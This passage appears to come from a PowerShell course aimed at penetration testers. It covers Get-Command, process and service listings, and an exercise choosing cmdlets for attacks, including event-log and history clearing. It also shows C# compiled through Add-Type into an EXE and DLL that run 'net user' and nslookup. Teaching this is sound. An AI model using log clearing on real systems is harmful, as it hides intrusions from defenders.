"Type". By default, Get-Command gets cmd lets and functions. Valid values are: -- Alias: All Windows PowerShell aliases in the current session. -- All: All command types. It is the equivalent of "get-command *". -- Application: All non-Windows-PowerShell files in paths listed in the Path environment variable ($env:path), incl uding .txt, .exe, and .dll files. -- Cmdlet: The cmdlets in the current session. "Cmdlet" is the default. -- ExternalScript: All .ps1 files in the paths listed in the Path environment variable ($env:path). -- Filter and Function: All Windows PowerShell functions. -- Script: Script blocks in the current session. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -Module Gets the commands that came from the specified modules or snap-ins. Enter the names of modules or snap-ins, or ente r snap-in or module objects. You can refer to this parameter by its name, Module, or by its alias, PSSnapin. The parameter name that you choose has no effect on the command or its output. This parameter takes string values, but you can also supply a PSModuleInfo or PSSnapinInfo object, such as the obje cts that Get-Module, Get-PSSnapin, and Import-PSSession return. Required? false Position? named Default value None Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -Name Gets information only about the cmdlets or command elements with the specified name. represents all or par t of the name of the cmdlet or command element. Wildcards are permitted. To list commands with the same name in execution order, type the command name without wildcard characters. For more information, see the Notes section. Required? false Position? 1 Default value Accept pipeline input? true (ByValue, ByPropertyName) Accept wildcard characters? false -Noun Gets cmdlets and functions with names that include the specified noun. represents one or more nouns or nou n patterns, such as "process" or "*item*". Wildcards are permitted. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -Syntax [] Gets only specified data about the command element. * For aliases, retrieves the standard name. * For cmdlets, retrieves the syntax. * For functions and filters, retrieves the function definition. * For scripts and applications (files), retrieves the path and filename. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -TotalCount Gets only the specified number of command elements. You can use this parameter to limit the output of a command. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false -Verb Gets information about cmdlets and functions with names that include the specified verb. represents one or more verbs or verb patterns, such as "remove" or *et". Wildcards are permitted. Required? false Position? named Default value Accept pipeline input? true (ByPropertyName) Accept wildcard characters? false PS C:\Users\Windows-32> ``` - List all ```Cmdlet``` of ```Get-Command``` with name ```process``` ```Powershell PS C:\Users\Windows-32> Get-Command -CommandType cmdlet -Name *process* CommandType Name Definition ----------- ---- ---------- Cmdlet Debug-Process Debug-Process [-Name] [-Verbose] [-De... Cmdlet Get-Process Get-Process [[-Name] ] [-ComputerName ... Cmdlet Start-Process Start-Process [-FilePath] [[-ArgumentLi... Cmdlet Stop-Process Stop-Process [-Id] [-PassThru] [-Force... Cmdlet Wait-Process Wait-Process [-Name] [[-Timeout] ``` - List all ```Cmdlet``` of ```Get-Command``` with name ```service``` ```Powershell PS C:\Users\Windows-32> Get-Command -CommandType cmdlet -Name *service* CommandType Name ----------- ---- Cmdlet Get-Service Cmdlet New-Service Cmdlet New-WebServiceProxy Cmdlet Restart-Service Cmdlet Resume-Service Cmdlet Set-Service Cmdlet Start-Service Cmdlet Stop-Service Cmdlet Suspend-Service PS C:\Users\Windows-32> ``` - Count ```Cmdlet``` of ```Get-Command``` ```Powershell PS C:\Users\Windows-32> Get-Command -CommandType cmdlet | Measure-Object Count : 236 Average : Sum : Maximum : Minimum : Property : PS C:\Users\Windows-32> ``` - ```Process Listing``` ```Powershell PS C:\Users\Windows-32> Get-Process Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 23 2 1752 1608 27 0.01 2864 cmd 91 4 196908 201960 250 2.94 2444 conhost 53 3 872 3536 43 0.04 2872 conhost 379 5 1092 2192 30 352 csrss 206 6 1104 3360 31 396 csrss 69 3 972 2732 36 0.02 324 dwm 716 23 22560 23892 181 1.64 740 explorer 0 0 0 12 0 0 Idle 60 3 2024 3180 51 0.01 2020 jusched 723 12 2928 5880 29 488 lsass 141 3 1020 2284 13 496 lsm 101 6 7772 9384 79 1.30 2716 notepad++ 829 10 43692 39648 184 1.71 2432 powershell 134 5 6364 9644 60 0.18 3008 python 95 4 1392 3920 36 2608 SearchFilterHost 630 15 17092 10908 88 292 SearchIndexer 278 5 2080 5696 42 3440 SearchProtocolHost 194 7 4248 4536 29 480 services 29 1 212 564 4 264 smss 288 9 4368 5372 55 1328 spoolsv 347 7 2552 5104 31 600 svchost 250 8 2072 4080 23 712 svchost 543 13 13692 10848 74 764 svchost 508 12 25240 28872 92 884 svchost 1048 27 13140 19608 96 924 svchost 441 16 5452 7284 46 1128 svchost 379 13 7620 7488 51 1232 svchost 305 24 8600 6560 43 1364 svchost 349 15 5044 7136 63 1468 svchost 98 7 1184 3092 22 1828 svchost 349 13 8112 8236 59 2376 svchost 353 23 45640 14440 207 3488 svchost 539 0 48 868 2 4 System 185 9 6728 5232 45 0.04 328 taskhost 115 5 1400 3292 43 660 VBoxService 143 5 1308 3920 58 0.03 1116 VBoxTray 75 5 836 2676 29 384 wininit 113 4 1508 3308 35 436 winlogon 421 15 7788 7104 104 2092 wmpnetwk 91 4 1152 4632 53 0.01 3860 wuauclt PS C:\Users\Windows-32> ``` - ```Service Listing``` ```Powershell PS C:\Users\Windows-32> Get-Service Status Name DisplayName ------ ---- ----------- Stopped AeLookupSvc Application Experience Stopped ALG Application Layer Gateway Service Stopped AppIDSvc Application Identity Stopped Appinfo Application Information Stopped AppMgmt Application Management Running AudioEndpointBu... Windows Audio Endpoint Builder Running Audiosrv Windows Audio Stopped AxInstSV ActiveX Installer (AxInstSV) Stopped BDESVC BitLocker Drive Encryption Service Running BFE Base Filtering Engine Stopped BITS Background Intelligent Transfer Ser... Running Browser Computer Browser Stopped bthserv Bluetooth Support Service Stopped CertPropSvc Certificate Propagation Stopped clr_optimizatio... Microsoft .NET Framework NGEN v2.0.... Stopped COMSysApp COM+ System Application Running CryptSvc Cryptographic Services Running CscService Offline Files Running DcomLaunch DCOM Server Process Launcher Stopped defragsvc Disk Defragmenter Running Dhcp DHCP Client Running Dnscache DNS Client Stopped dot3svc Wired AutoConfig Running DPS Diagnostic Policy Service Stopped EapHost Extensible Authentication Protocol Stopped EFS Encrypting File System (EFS) Stopped ehRecvr Windows Media Center Receiver Service Stopped ehSched Windows Media Center Scheduler Service Running eventlog Windows Event Log Running EventSystem COM+ Event System Stopped Fax Fax Running fdPHost Function Discovery Provider Host Running FDResPub Function Discovery Resource Publica... Stopped FontCache Windows Font Cache Service Stopped FontCache3.0.0.0 Windows Presentation Foundation Fon... Running gpsvc Group Policy Client Stopped hidserv Human Interface Device Access Stopped hkmsvc Health Key and Certificate Management Running HomeGroupProvider HomeGroup Provider Stopped idsvc Windows CardSpace Running IKEEXT IKE and AuthIP IPsec Keying Modules Stopped IPBusEnum PnP-X IP Bus Enumerator Running iphlpsvc IP Helper Running KeyIso CNG Key Isolation Stopped KtmRm KtmRm for Distributed Transaction C... Running LanmanServer Server Running LanmanWorkstation Workstation Stopped lltdsvc Link-Layer Topology Discovery Mapper Running lmhosts TCP/IP NetBIOS Helper Stopped Mcx2Svc Media Center Extender Service Stopped MMCSS Multimedia Class Scheduler Stopped MozillaMaintenance Mozilla Maintenance Service Running MpsSvc Windows Firewall Stopped MSDTC Distributed Transaction Coordinator Stopped MSiSCSI Microsoft iSCSI Initiator Service Stopped msiserver Windows Installer Stopped napagent Network Access Protection Agent Stopped Netlogon Netlogon Running Netman Network Connections Running netprofm Network List Service Stopped NetTcpPortSharing Net.Tcp Port Sharing Service Running NlaSvc Network Location Awareness Running nsi Network Store Interface Service Running p2pimsvc Peer Networking Identity Manager Running p2psvc Peer Networking Grouping Stopped PcaSvc Program Compatibility Assistant Ser... Stopped PeerDistSvc BranchCache Stopped pla Performance Logs & Alerts Running PlugPlay Plug and Play Stopped PNRPAutoReg PNRP Machine Name Publication Service Running PNRPsvc Peer Name Resolution Protocol Running PolicyAgent IPsec Policy Agent Running Power Power Running ProfSvc User Profile Service Stopped ProtectedStorage Protected Storage Stopped QWAVE Quality Windows Audio Video Experience Stopped RasAuto Remote Access Auto Connection Manager Stopped RasMan Remote Access Connection Manager Stopped RemoteAccess Routing and Remote Access Stopped RemoteRegistry Remote Registry Running RpcEptMapper RPC Endpoint Mapper Stopped RpcLocator Remote Procedure Call (RPC) Locator Running RpcSs Remote Procedure Call (RPC) Running SamSs Security Accounts Manager Stopped SCardSvr Smart Card Running Schedule Task Scheduler Stopped SCPolicySvc Smart Card Removal Policy Stopped SDRSVC Windows Backup Stopped seclogon Secondary Logon Running SENS System Event Notification Service Stopped SensrSvc Adaptive Brightness Stopped SessionEnv Remote Desktop Configuration Stopped SharedAccess Internet Connection Sharing (ICS) Running ShellHWDetection Shell Hardware Detection Stopped SNMPTRAP SNMP Trap Running Spooler Print Spooler Stopped sppsvc Software Protection Stopped sppuinotify SPP Notification Service Running SSDPSRV SSDP Discovery Stopped SstpSvc Secure Socket Tunneling Protocol Se... Stopped StiSvc Windows Image Acquisition (WIA) Stopped swprv Microsoft Software Shadow Copy Prov... Running SysMain Superfetch Stopped TabletInputService Tablet PC Input Service Stopped TapiSrv Telephony Stopped TBS TPM Base Services Stopped TermService Remote Desktop Services Running Themes Themes Stopped THREADORDER Thread Ordering Server Running TrkWks Distributed Link Tracking Client Stopped TrustedInstaller Windows Modules Installer Stopped UI0Detect Interactive Services Detection Stopped UmRdpService Remote Desktop Services UserMode Po... Running upnphost UPnP Device Host Running UxSms Desktop Window Manager Session Manager Stopped VaultSvc Credential Manager Running VBoxService VirtualBox Guest Additions Service Stopped vds Virtual Disk Stopped VSS Volume Shadow Copy Stopped W32Time Windows Time Stopped wbengine Block Level Backup Engine Service Stopped WbioSrvc Windows Biometric Service Stopped wcncsvc Windows Connect Now - Config Registrar Stopped WcsPlugInService Windows Color System Running WdiServiceHost Diagnostic Service Host Stopped WdiSystemHost Diagnostic System Host Stopped WebClient WebClient Stopped Wecsvc Windows Event Collector Stopped wercplsupport Problem Reports and Solutions Contr... Stopped WerSvc Windows Error Reporting Service Running WinDefend Windows Defender Stopped WinHttpAutoProx... WinHTTP Web Proxy Auto-Discovery Se... Running Winmgmt Windows Management Instrumentation Stopped WinRM Windows Remote Management (WS-Manag... Stopped Wlansvc WLAN AutoConfig Stopped wmiApSrv WMI Performance Adapter Running WMPNetworkSvc Windows Media Player Network Sharin... Stopped WPCSvc Parental Controls Stopped WPDBusEnum Portable Device Enumerator Service Running wscsvc Security Center Running WSearch Windows Search Running wuauserv Windows Update Stopped wudfsvc Windows Driver Foundation - User-mo... Stopped WwanSvc WWAN AutoConfig PS C:\Users\Windows-32> ``` - List all ```Cmdlet``` of ```Get-Command``` with name ```start``` ```Powershell PS C:\Users\Windows-32> Get-Command -Verb start CommandType Name ----------- ---- Cmdlet Start-Job Cmdlet Start-Process Cmdlet Start-Service Cmdlet Start-Sleep Cmdlet Start-Transaction Cmdlet Start-Transcript PS C:\Users\Windows-32> ``` - List all ```Cmdlet``` of ```Get-Command``` with name ```stop``` ```Powershell PS C:\Users\Windows-32> Get-Command -Verb stop CommandType Name ----------- ---- Cmdlet Stop-Computer Cmdlet Stop-Job Cmdlet Stop-Process Cmdlet Stop-Service Cmdlet Stop-Transcript PS C:\Users\Windows-32> ``` - Examples of ```Start-Process``` ```Powershell PS C:\Users\Windows-32> Get-Help Start-Process -Examples NAME Start-Process SYNOPSIS Starts one or more processes on the local computer. -------------------------- EXAMPLE 1 -------------------------- C:\PS>start-process sort.exe Description ----------- This command starts a process that uses the Sort.exe file in the current directory. The command uses all of the default values, including the default window style, working directory, and credentials. -------------------------- EXAMPLE 2 -------------------------- C:\PS>start-process myfile.txt -workingdirectory "C:\PS-Test" -verb Print Description ----------- This command starts a process that prints the C:\PS-Test\MyFile.txt file. -------------------------- EXAMPLE 3 -------------------------- C:\PS>start-process Sort.exe -RedirectStandardInput Testsort.txt -RedirectStandardOutput Sorted.txt -RedirectStandardError SortError.txt -UseNewEnvironment Description ----------- This command starts a process that sorts items in the Testsort.txt file and returns the sorted items in the Sorted.txt files. Any errors are written to the SortError.txt file. The UseNewEnvironment parameter specifies that the process runs with its own environment variables. -------------------------- EXAMPLE 4 -------------------------- C:\PS>start-process notepad -wait -windowstyle Maximized Description ----------- This command starts the Notepad process. It maximizes the window and retains the window until the process completes. PS C:\Users\Windows-32> ``` - ```Start-Process``` ```Powershell PS C:\Users\Windows-32> Start-Process notepad.exe ``` - ```Stop-Process``` ```Powershell PS C:\Users\Windows-32> Stop-Process -Name notepad ``` - ```Start-Process``` and ```Stop-Process``` ```Powershell PS C:\Users\Windows-32> Get-Process -Name notepad Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 56 3 912 4256 55 0.15 1592 notepad 56 3 912 4136 55 0.04 2360 notepad 56 3 916 4208 55 0.07 2960 notepad 56 3 916 4208 55 0.07 3288 notepad PS C:\Users\Windows-32> ``` ```Powershell PS C:\Users\Windows-32> Stop-Process -Id 1592 ``` ```Powershell PS C:\Users\Windows-32> Get-Process -Name notepad Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 56 3 912 4136 55 0.04 2360 notepad 56 3 916 4208 55 0.07 2960 notepad 56 3 916 4208 55 0.07 3288 notepad PS C:\Users\Windows-32> ``` - List all ```Hotfixes``` ```Powershell PS C:\Users\Windows-32> Get-HotFix ``` - ```Get-Help``` for ```command``` ```Powershell PS C:\Users\Windows-32> Get-Help *command* Name Category Synopsis ---- -------- -------- Get-Command Cmdlet Gets basic information about cmdlets and other elements of Windows PowerShell commands. Invoke-Command Cmdlet Runs commands on local and remote computers. Measure-Command Cmdlet Measures the time it takes to run script blocks and cmdlets. Trace-Command Cmdlet Configures and starts a trace of the specified expression or command. about_command_precedence HelpFile Describes how Windows PowerShell determines which command to run. about_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help. about_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell PS C:\Users\Windows-32> ``` - ```Get-Help``` for ```about_Core_Commands``` ```Powershell PS C:\Users\Windows-32> Get-Help about_Core_Commands TOPIC about_Core_Commands SHORT DESCRIPTION Lists the cmdlets that are designed for use with Windows PowerShell providers. LONG DESCRIPTION Windows PowerShell includes a set of cmdlets that are specifically designed to manage the items in the data stores that are exposed by Windows PowerShell providers. You can use these cmdlets in the same ways to manage all the different types of data that the providers make available to you. For more information about providers, type "get-help about_providers". For example, you can use the Get-ChildItem cmdlet to list the files in a file system directory, the keys under a registry key, or the items that are exposed by a provider that you write or download. The following is a list of the Windows PowerShell cmdlets that are designed for use with providers: ChildItem cmdlets Get-ChildItem Content cmdlets Add-Content Clear-Content Get-Content Set-Content Item cmdlets Clear-Item Copy-Item Get-Item Invoke-Item Move-Item New-Item Remove-Item Rename-Item Set-Item ItemProperty cmdlets Clear-ItemProperty Copy-ItemProperty Get-ItemProperty Move-ItemProperty New-ItemProperty Remove-ItemProperty Rename-ItemProperty Set-ItemProperty Location cmdlets Get-Location Pop-Location Push-Location Set-Location Path cmdlets Join-Path Convert-Path Split-Path Resolve-Path Test-Path PSDrive cmdlets Get-PSDrive New-PSDrive Remove-PSDrive PSProvider cmdlets Get-PSProvider For more information about a cmdlet, type "get-help ". SEE ALSO about_Providers PS C:\Users\Windows-32> ``` ###### Exercise Explore ```cmdlets``` using ```Get-Command``` and pick ten ```cmdlets``` which could be useful in ```penetration tests```. - List of all ```cmdlet``` ```Powershell PS C:\Users\Windows-32> Get-Command -type cmdlet CommandType Name ----------- ---- Cmdlet Add-Computer Cmdlet Add-Content Cmdlet Add-History Cmdlet Add-Member Cmdlet Add-PSSnapin Cmdlet Add-Type Cmdlet Checkpoint-Computer Cmdlet Clear-Content Cmdlet Clear-EventLog Cmdlet Clear-History Cmdlet Clear-Item Cmdlet Clear-ItemProperty Cmdlet Clear-Variable Cmdlet Compare-Object Cmdlet Complete-Transaction Cmdlet Connect-WSMan Cmdlet ConvertFrom-Csv Cmdlet ConvertFrom-SecureString Cmdlet ConvertFrom-StringData Cmdlet Convert-Path Cmdlet ConvertTo-Csv Cmdlet ConvertTo-Html Cmdlet ConvertTo-SecureString Cmdlet ConvertTo-Xml Cmdlet Copy-Item Cmdlet Copy-ItemProperty Cmdlet Debug-Process Cmdlet Disable-ComputerRestore Cmdlet Disable-PSBreakpoint Cmdlet Disable-PSSessionConfiguration Cmdlet Disable-WSManCredSSP Cmdlet Disconnect-WSMan Cmdlet Enable-ComputerRestore Cmdlet Enable-PSBreakpoint Cmdlet Enable-PSRemoting Cmdlet Enable-PSSessionConfiguration Cmdlet Enable-WSManCredSSP Cmdlet Enter-PSSession Cmdlet Exit-PSSession Cmdlet Export-Alias Cmdlet Export-Clixml Cmdlet Export-Console Cmdlet Export-Counter Cmdlet Export-Csv Cmdlet Export-FormatData Cmdlet Export-ModuleMember Cmdlet Export-PSSession Cmdlet ForEach-Object Cmdlet Format-Custom Cmdlet Format-List Cmdlet Format-Table Cmdlet Format-Wide Cmdlet Get-Acl Cmdlet Get-Alias Cmdlet Get-AuthenticodeSignature Cmdlet Get-ChildItem Cmdlet Get-Command Cmdlet Get-ComputerRestorePoint Cmdlet Get-Content Cmdlet Get-Counter Cmdlet Get-Credential Cmdlet Get-Culture Cmdlet Get-Date Cmdlet Get-Event Cmdlet Get-EventLog Cmdlet Get-EventSubscriber Cmdlet Get-ExecutionPolicy Cmdlet Get-FormatData Cmdlet Get-Help Cmdlet Get-History Cmdlet Get-Host Cmdlet Get-HotFix Cmdlet Get-Item Cmdlet Get-ItemProperty Cmdlet Get-Job Cmdlet Get-Location Cmdlet Get-Member Cmdlet Get-Module Cmdlet Get-PfxCertificate Cmdlet Get-Process Cmdlet Get-PSBreakpoint Cmdlet Get-PSCallStack Cmdlet Get-PSDrive Cmdlet Get-PSProvider Cmdlet Get-PSSession Cmdlet Get-PSSessionConfiguration Cmdlet Get-PSSnapin Cmdlet Get-Random Cmdlet Get-Service Cmdlet Get-TraceSource Cmdlet Get-Transaction Cmdlet Get-UICulture Cmdlet Get-Unique Cmdlet Get-Variable Cmdlet Get-WinEvent Cmdlet Get-WmiObject Cmdlet Get-WSManCredSSP Cmdlet Get-WSManInstance Cmdlet Group-Object Cmdlet Import-Alias Cmdlet Import-Clixml Cmdlet Import-Counter Cmdlet Import-Csv Cmdlet Import-LocalizedData Cmdlet Import-Module Cmdlet Import-PSSession Cmdlet Invoke-Command Cmdlet Invoke-Expression Cmdlet Invoke-History Cmdlet Invoke-Item Cmdlet Invoke-WmiMethod Cmdlet Invoke-WSManAction Cmdlet Join-Path Cmdlet Limit-EventLog Cmdlet Measure-Command Cmdlet Measure-Object Cmdlet Move-Item Cmdlet Move-ItemProperty Cmdlet New-Alias Cmdlet New-Event Cmdlet New-EventLog Cmdlet New-Item Cmdlet New-ItemProperty Cmdlet New-Module Cmdlet New-ModuleManifest Cmdlet New-Object Cmdlet New-PSDrive Cmdlet New-PSSession Cmdlet New-PSSessionOption Cmdlet New-Service Cmdlet New-TimeSpan Cmdlet New-Variable Cmdlet New-WebServiceProxy Cmdlet New-WSManInstance Cmdlet New-WSManSessionOption Cmdlet Out-Default Cmdlet Out-File Cmdlet Out-GridView Cmdlet Out-Host Cmdlet Out-Null Cmdlet Out-Printer Cmdlet Out-String Cmdlet Pop-Location Cmdlet Push-Location Cmdlet Read-Host Cmdlet Receive-Job Cmdlet Register-EngineEvent Cmdlet Register-ObjectEvent Cmdlet Register-PSSessionConfiguration Cmdlet Register-WmiEvent Cmdlet Remove-Computer Cmdlet Remove-Event Cmdlet Remove-EventLog Cmdlet Remove-Item Cmdlet Remove-ItemProperty Cmdlet Remove-Job Cmdlet Remove-Module Cmdlet Remove-PSBreakpoint Cmdlet Remove-PSDrive Cmdlet Remove-PSSession Cmdlet Remove-PSSnapin Cmdlet Remove-Variable Cmdlet Remove-WmiObject Cmdlet Remove-WSManInstance Cmdlet Rename-Item Cmdlet Rename-ItemProperty Cmdlet Reset-ComputerMachinePassword Cmdlet Resolve-Path Cmdlet Restart-Computer Cmdlet Restart-Service Cmdlet Restore-Computer Cmdlet Resume-Service Cmdlet Select-Object Cmdlet Select-String Cmdlet Select-Xml Cmdlet Send-MailMessage Cmdlet Set-Acl Cmdlet Set-Alias Cmdlet Set-AuthenticodeSignature Cmdlet Set-Content Cmdlet Set-Date Cmdlet Set-ExecutionPolicy Cmdlet Set-Item Cmdlet Set-ItemProperty Cmdlet Set-Location Cmdlet Set-PSBreakpoint Cmdlet Set-PSDebug Cmdlet Set-PSSessionConfiguration Cmdlet Set-Service Cmdlet Set-StrictMode Cmdlet Set-TraceSource Cmdlet Set-Variable Cmdlet Set-WmiInstance Cmdlet Set-WSManInstance Cmdlet Set-WSManQuickConfig Cmdlet Show-EventLog Cmdlet Sort-Object Cmdlet Split-Path Cmdlet Start-Job Cmdlet Start-Process Cmdlet Start-Service Cmdlet Start-Sleep Cmdlet Start-Transaction Cmdlet Start-Transcript Cmdlet Stop-Computer Cmdlet Stop-Job Cmdlet Stop-Process Cmdlet Stop-Service Cmdlet Stop-Transcript Cmdlet Suspend-Service Cmdlet Tee-Object Cmdlet Test-ComputerSecureChannel Cmdlet Test-Connection Cmdlet Test-ModuleManifest Cmdlet Test-Path Cmdlet Test-WSMan Cmdlet Trace-Command Cmdlet Undo-Transaction Cmdlet Unregister-Event Cmdlet Unregister-PSSessionConfiguration Cmdlet Update-FormatData Cmdlet Update-List Cmdlet Update-TypeData Cmdlet Use-Transaction Cmdlet Wait-Event Cmdlet Wait-Job Cmdlet Wait-Process Cmdlet Where-Object Cmdlet Write-Debug Cmdlet Write-Error Cmdlet Write-EventLog Cmdlet Write-Host Cmdlet Write-Output Cmdlet Write-Progress Cmdlet Write-Verbose Cmdlet Write-Warning PS C:\Users\Windows-32> ``` - List of all ```cmdlet``` useful in Penetration tests - Add-Computer - Clear-EventLog - Clear-History - Disable-ComputerRestore - Get-Acl - Remove-EventLog - Set-Date - Start-Process - Start-Service - Stop-Process - Stop-Service - Write-Output ================================================ FILE: 30-Using-NET-in-Powershell-Part-4.md ================================================ #### 30. Using .NET in Powershell Part 4 ###### Add-Type - Use ```Add-Type``` with ```-FromPath``` ```Invoke-SysCommandsDLL.ps1``` ```PowerShell $DotnetCode = @" public class SysCommands { public static void lookup (string domainname) { System.Diagnostics.Process.Start("nslookup.exe",domainname); } public void netcmd (string cmd) { string cmdstring = "/k net.exe " + cmd; System.Diagnostics.Process.Start("cmd.exe",cmdstring); } public static void Main() { string cmdstring = "/k net.exe " + "user"; System.Diagnostics.Process.Start("cmd.exe",cmdstring); } } "@ #Add-Type -TypeDefinition $DotnetCode -OutputType Library -OutputAssembly C:\Users\Administrator\Desktop\SysCommands.dll Add-Type -TypeDefinition $DotnetCode -OutputType ConsoleApplication -OutputAssembly C:\Users\Administrator\Desktop\SysCommand.exe <##[SysCommands]::lookup("google.com") $obj = New-Object SysCommands $obj.netcmd("user")#> ``` ```PowerShell $DotnetCode = @" public class SysCommands { public static void lookup (string domainname) { System.Diagnostics.Process.Start("nslookup.exe",domainname); } public void netcmd (string cmd) { string cmdstring = "/k net.exe " + cmd; System.Diagnostics.Process.Start("cmd.exe",cmdstring); } public static void Main() { string cmdstring = "/k net.exe " + "user"; System.Diagnostics.Process.Start("cmd.exe",cmdstring); } } "@ Add-Type -TypeDefinition $DotnetCode -OutputType Library -OutputAssembly C:\Users\Administrator\Desktop\SysCommands.dll #Add-Type -TypeDefinition $DotnetCode -OutputType ConsoleApplication -OutputAssembly C:\Users\Administrator\Desktop\SysCommand.exe <##[SysCommands]::lookup("google.com") $obj = New-Object SysCommands $obj.netcmd("user")#> ``` - Compiling ```DLLs``` / ```ConsoleApps``` ```PowerShell PS C:\Users\Administrator\Desktop\Code\30> .\Invoke-SysCommandsDLL.ps1 ``` ```PowerShell PS C:\Users\Administrator\Desktop> ls SysComm* Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/12/2017 3:28 PM 4096 SysCommand.exe -a--- 7/12/2017 3:27 PM 3584 SysCommands.dll PS C:\Users\Administrator\Desktop> ``` - Using ```EXE``` ![Image of EXE](images/6.jpeg) - Using ```DLLs``` ```PowerShell PS C:\Users\Administrator\Desktop> $obj = Add-Type -Path .\SysCommands.dll -PassThru ``` ```PowerShell PS C:\Users\Administrator\Desktop> [SysCommands]::lookup("google.com") ``` ```PowerShell PS C:\Users\Administrator\Desktop> $obj | Get-Member TypeName: System.RuntimeType Name MemberType Definition ---- ---------- ---------- AsType Method type AsType() Clone Method System.Object Clone(), System.Object ICloneable.Clone() Equals Method bool Equals(System.Object obj), bool Equals(type o), bool _MemberInfo.Equals(System.Object other), bool _Type.Equals(System.Object other), bool _Type.Equals(... FindInterfaces Method type[] FindInterfaces(System.Reflection.TypeFilter filter, System.Object filterCriteria), type[] _Type.FindInterfaces(System.Reflection.TypeFilter filter, Sy... FindMembers Method System.Reflection.MemberInfo[] FindMembers(System.Reflection.MemberTypes memberType, System.Reflection.BindingFlags bindingAttr, System.Reflection.MemberFilt... GetArrayRank Method int GetArrayRank(), int _Type.GetArrayRank() GetConstructor Method System.Reflection.ConstructorInfo GetConstructor(System.Reflection.BindingFlags bindingAttr, System.Reflection.Binder binder, System.Reflection.CallingConven... GetConstructors Method System.Reflection.ConstructorInfo[] GetConstructors(System.Reflection.BindingFlags bindingAttr), System.Reflection.ConstructorInfo[] GetConstructors(), Syste... GetCustomAttributes Method System.Object[] GetCustomAttributes(bool inherit), System.Object[] GetCustomAttributes(type attributeType, bool inherit), System.Object[] ICustomAttributePro... GetCustomAttributesData Method System.Collections.Generic.IList[System.Reflection.CustomAttributeData] GetCustomAttributesData() GetDeclaredEvent Method System.Reflection.EventInfo GetDeclaredEvent(string name) GetDeclaredField Method System.Reflection.FieldInfo GetDeclaredField(string name) GetDeclaredMethod Method System.Reflection.MethodInfo GetDeclaredMethod(string name) GetDeclaredMethods Method System.Collections.Generic.IEnumerable[System.Reflection.MethodInfo] GetDeclaredMethods(string name) GetDeclaredNestedType Method System.Reflection.TypeInfo GetDeclaredNestedType(string name) GetDeclaredProperty Method System.Reflection.PropertyInfo GetDeclaredProperty(string name) GetDefaultMembers Method System.Reflection.MemberInfo[] GetDefaultMembers(), System.Reflection.MemberInfo[] _Type.GetDefaultMembers() GetElementType Method type GetElementType(), type _Type.GetElementType() GetEnumName Method string GetEnumName(System.Object value) GetEnumNames Method string[] GetEnumNames() GetEnumUnderlyingType Method type GetEnumUnderlyingType() GetEnumValues Method array GetEnumValues() GetEvent Method System.Reflection.EventInfo GetEvent(string name, System.Reflection.BindingFlags bindingAttr), System.Reflection.EventInfo GetEvent(string name), System.Refl... GetEvents Method System.Reflection.EventInfo[] GetEvents(System.Reflection.BindingFlags bindingAttr), System.Reflection.EventInfo[] GetEvents(), System.Reflection.EventInfo[]... GetField Method System.Reflection.FieldInfo GetField(string name, System.Reflection.BindingFlags bindingAttr), System.Reflection.FieldInfo GetField(string name), System.Refl... GetFields Method System.Reflection.FieldInfo[] GetFields(System.Reflection.BindingFlags bindingAttr), System.Reflection.FieldInfo[] GetFields(), System.Reflection.FieldInfo[]... GetGenericArguments Method type[] GetGenericArguments() GetGenericParameterConstraints Method type[] GetGenericParameterConstraints() GetGenericTypeDefinition Method type GetGenericTypeDefinition() GetHashCode Method int GetHashCode(), int _MemberInfo.GetHashCode(), int _Type.GetHashCode() GetIDsOfNames Method void _MemberInfo.GetIDsOfNames([ref] guid riid, System.IntPtr rgszNames, uint32 cNames, uint32 lcid, System.IntPtr rgDispId), void _Type.GetIDsOfNames([ref] ... GetInterface Method type GetInterface(string fullname, bool ignoreCase), type GetInterface(string name), type _Type.GetInterface(string name, bool ignoreCase), type _Type.GetInt... GetInterfaceMap Method System.Reflection.InterfaceMapping GetInterfaceMap(type ifaceType), System.Reflection.InterfaceMapping _Type.GetInterfaceMap(type interfaceType) GetInterfaces Method type[] GetInterfaces(), type[] _Type.GetInterfaces() GetMember Method System.Reflection.MemberInfo[] GetMember(string name, System.Reflection.MemberTypes type, System.Reflection.BindingFlags bindingAttr), System.Reflection.Memb... GetMembers Method System.Reflection.MemberInfo[] GetMembers(System.Reflection.BindingFlags bindingAttr), System.Reflection.MemberInfo[] GetMembers(), System.Reflection.MemberI... GetMethod Method System.Reflection.MethodInfo GetMethod(string name, System.Reflection.BindingFlags bindingAttr, System.Reflection.Binder binder, System.Reflection.CallingCon... GetMethods Method System.Reflection.MethodInfo[] GetMethods(System.Reflection.BindingFlags bindingAttr), System.Reflection.MethodInfo[] GetMethods(), System.Reflection.MethodI... GetNestedType Method type GetNestedType(string fullname, System.Reflection.BindingFlags bindingAttr), type GetNestedType(string name), type _Type.GetNestedType(string name, Syste... GetNestedTypes Method type[] GetNestedTypes(System.Reflection.BindingFlags bindingAttr), type[] GetNestedTypes(), type[] _Type.GetNestedTypes(System.Reflection.BindingFlags bindin... GetObjectData Method void GetObjectData(System.Runtime.Serialization.SerializationInfo info, System.Runtime.Serialization.StreamingContext context), void ISerializable.GetObjectD... GetProperties Method System.Reflection.PropertyInfo[] GetProperties(System.Reflection.BindingFlags bindingAttr), System.Reflection.PropertyInfo[] GetProperties(), System.Reflecti... GetProperty Method System.Reflection.PropertyInfo GetProperty(string name, System.Reflection.BindingFlags bindingAttr, System.Reflection.Binder binder, type returnType, type[] ... GetType Method type GetType(), type _MemberInfo.GetType(), type _Type.GetType() GetTypeInfo Method void _MemberInfo.GetTypeInfo(uint32 iTInfo, uint32 lcid, System.IntPtr ppTInfo), void _Type.GetTypeInfo(uint32 iTInfo, uint32 lcid, System.IntPtr ppTInfo), S... GetTypeInfoCount Method void _MemberInfo.GetTypeInfoCount([ref] uint32 pcTInfo), 